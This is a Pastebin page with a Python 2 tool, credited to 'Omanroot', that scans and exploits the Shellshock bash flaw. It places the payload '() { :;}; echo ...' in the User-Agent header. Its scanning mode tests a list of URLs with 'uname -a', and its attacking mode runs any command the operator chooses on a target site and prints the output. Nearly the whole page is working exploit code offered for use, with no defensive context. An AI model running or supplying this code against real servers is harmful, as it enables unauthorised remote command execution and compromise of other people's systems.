Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #wrote by Omanroot
- #om-root@hotmail.com
- #(C) 15 year
- import urllib
- import sys , optparse
- def scanning(urllist):
- ul = open(urllist,'r') # opening file which have urls
- for url in ul.readlines():
- command = "/bin/uname -a"
- urllib.FancyURLopener.version = "() { :;}; echo \"Content-Type: text/plain\"; echo; "+command
- opener = urllib.FancyURLopener({})
- page = opener.open(url)
- if 'Linux' in page.read():
- print "[+]Found vulnerable site: "+url
- else:
- print "[-]Not a vulnerable: "+url
- def attacking(site,cmd):
- try:
- urllib.FancyURLopener.version = "() { :;}; echo \"Content-Type: text/plain\"; echo; "+cmd
- opener = urllib.FancyURLopener({})
- pageinfo = opener.open(site)
- print pageinfo.read()
- except:
- print "cannot reachable to site ."
- def Main():
- print """
- ----------------------------------------------------
- | scanning and exploit shellshock (WA) |
- | author : Omanroot |
- | email : om-root@hotmail.com |
- | from : Oman |
- ----------------------------------------------------
- """
- parser = optparse.OptionParser("Usage by python "+sys.argv[0]+" \nscanning mode:\n -U <urllist>\n Attacking mode: \n -s <site> -c <cmd>")
- parser.add_option('-U',dest='urllist',type='string',help='put urllist to check if its vulerable.')
- parser.add_option('-s',dest='site',type='string',help='specify site to execute a command .')
- parser.add_option('-c',dest='cmd',type='string',help='specify command path to execute ,eg: /bin/ls')
- (options,args) = parser.parse_args()
- if options.urllist !=None:
- print "Starting scanning mode.. "
- scanning(options.urllist)
- else:
- print parser.usage[0:0]
- if (options.site != None) | (options.cmd !=None):
- print "Starting Attacking mode.. "
- attacking(options.site,options.cmd)
- else:
- print parser.usage
- if __name__=='__main__':
- Main()
- # "Starting scanning mode.. " , "Starting Attacking mode.. "
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
